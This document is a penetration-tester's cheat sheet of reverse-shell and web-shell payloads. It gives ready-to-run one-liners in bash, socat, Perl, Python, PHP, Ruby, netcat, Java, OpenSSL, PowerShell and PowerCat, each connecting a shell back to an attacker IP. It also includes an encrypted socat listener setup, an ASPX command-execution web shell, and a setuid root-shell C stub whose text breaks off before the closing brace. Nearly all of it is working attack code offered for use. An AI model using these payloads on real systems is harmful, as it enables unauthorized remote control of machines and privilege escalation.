REVERSE SHELLS

Reverse Shells

Bash

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1


Socat

On Attack Machine;

  socat file:`tty`,raw,echo=0 tcp-listen:4444 

On Target Machine;

  socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444  


Socat Can Be Set Up Like Metasploits /multi/handler by creating a listener using this command. For this to be done carry out the following tasks.

1.) Create an SSL certificate for use if you do not already have one you are using.

openssl req -newkey rsa:2048 -nodes -keyout server.key -x509 -days 30 -out server.crt


cat server.key server.crt > server.pem

2.) Now we will create the script that is run on each incoming connection.  This script needs to launch a tmux window running a socat process copying from a UNIX domain socket to stdio (in tmux), and then connecting another socatbetween the stdio coming in to the UNIX domain socket.

#!/bin/bash

SOCKDIR=$(mktemp -d)
SOCKF=${SOCKDIR}/usock

# Start tmux, if needed
tmux start
# Create window
tmux new-window "socat UNIX-LISTEN:${SOCKF},umask=0077 STDIO"
# Wait for socket
while test ! -e ${SOCKF} ; do sleep 1 ; done
# Use socat to ship data between the unix socket and STDIO.
exec socat STDIO UNIX-CONNECT:${SOCKF}

3.) Launch the Socat Listener 

socat OPENSSL-LISTEN:8443,cert=server.pem,reuseaddr,verify=0,fork EXEC:./socatscript.sh


Perl

perl   -e 'use   Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh   -i");};'



Python

python   -c 'import   socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0);   os.dup2(s.fileno(),1);   os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'



PHP

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'



Ruby

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'



Netcat

nc -e /bin/sh 10.0.0.1 1234

OR

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f



Java

r = Runtime.getRuntime()

p   = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat   <&5 | while read line; do \$line 2>&5 >&5; done"]   as String[])

p.waitFor()



Shell Pop

shellpop --reverse --number 5 --host <interface> --port <port>



Open SSL

openssl.exe s_client -quiet -connect <ip>:<port> | cmd.exe | openssl.exe s_client -quiet -connect 10.10.14.11 8089



PowerCat

https://github.com/besimorhino/powercat

Basic Listener:
   powercat -l -p 8000

Serve a cmd Shell:
   powercat -l -p 443 -e cmd
Send a cmd Shell:
   powercat -c 10.1.1.1 -p 443 -e cmd
Serve a shell which executes powershell commands:
   powercat -l -p 443 -ep


PowerShell

$client   = New-Object   System.Net.Sockets.TCPClient("<ip>",<port>);$stream =   $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i =   $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object   -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback =   (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " +   (pwd).Path + "> ";$sendbyte =   ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()



xTerm

xterm -display 10.0.0.1:1


=====================

WEB SHELLS

=====================

ASPX

 <%response.write CreateObject("WScript.Shell").Exec(Request.QueryString("cmd")).StdOut.Readall()%> 



ASP

CMD.asp



p0wny

p0wny_shell



DLL Shell

dll.cpp



ShellPop

ShellPop



Set UID Shell

 int main()
{
  setuid(geteuid());
  system("/bin/bash");
  return 0;